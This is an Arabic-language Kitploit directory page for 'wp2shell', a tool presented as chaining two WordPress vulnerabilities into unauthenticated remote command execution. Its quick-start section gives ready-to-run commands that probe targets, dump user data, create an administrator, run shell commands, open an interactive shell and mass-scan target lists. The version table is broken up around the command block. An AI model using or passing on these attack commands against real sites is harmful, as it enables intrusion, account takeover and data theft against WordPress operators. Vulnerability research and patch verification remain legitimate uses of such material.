Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
wp2shell — wp2shell - WordPress RCE & PoC (CVE-2026-63030 + CVE-2026-60137) | Kitploit
أدوات/GitHubGitHub/johenlastgen-jlg/wp2shell
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubjohenlastgen-jlg/wp2shell

wp2shell

wp2shell - WordPress RCE & PoC (CVE-2026-63030 + CVE-2026-60137)

عرض المستودع
2111منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

wp2shell - WordPress RCE PoC (CVE-2026-63030 + CVE-2026-60137)

تنفيذ أوامر عن بُعد غير مصادق عليه في نواة ووردبريس

بواسطة: JohenLastGen


📌 نظرة عامة

تقوم هذه الأداة بربط ثغرتين أمنيتين حاسمتين في ووردبريس لتحقيق تنفيذ أوامر عن بُعد غير مصادق:

الثغرةCVEالوصف
التوجيه الخاطئ للسُبل المجمّعة في RESTCVE-2026-63030تجاوز التحقق، تهريب حمولة SQLi
حقن SQL عبر author__not_in في WP_QueryCVE-2026-60137حقن سلسلة نصية خام → تنفيذ SQL

التأثير: مهاجم غير مصادق → إنشاء مدير → تنفيذ الأوامر


🎯 الإصدارات المتأثرة

نطاق الإصدارالحالة
ووردبريس 6.9.0 - 6.9.4✅ قابل للاختراق (سلسلة RCE كاملة)

🚀 بداية سريعة

root@kitploit:~
#خيارات:
  -h, --help عرض رسالة المساعدة والخروج
python3 wp2shell.py --help

# 1. التحقق مما إذا كان الهدف قابلًا للاختراق
python3 wp2shell.py check https://target.com

# 2. استخراج البيانات (بصمة/مستخدمين)
python3 wp2shell.py read https://target.com --preset fingerprint
python2 wp2shell.py read https://target.com --preset users

# 3. RCE - إنشاء مدير وتنفيذ أمر (لا حاجة لبيانات اعتماد!)
python3 wp2shell.py shell https://target.com --cmd "id"

# 4. شل تفاعلي
python3 wp2shell.py shell https://target.com --interactive

# 5. مسح جماعي لأهداف متعددة
python3 wp2shell.py scan targets.txt --threads 50 --prove --json results.json
تنزيل الأداة
ووردبريس 7.0.0 - 7.0.1
✅ قابل للاختراق (سلسلة RCE كاملة)
ووردبريس 6.8.0 - 6.8.5⚠️ حقن SQL فقط (يحتاج إضافة مساعدة)
ووردبريس 6.9.5، 7.0.2+❌ مُصحّح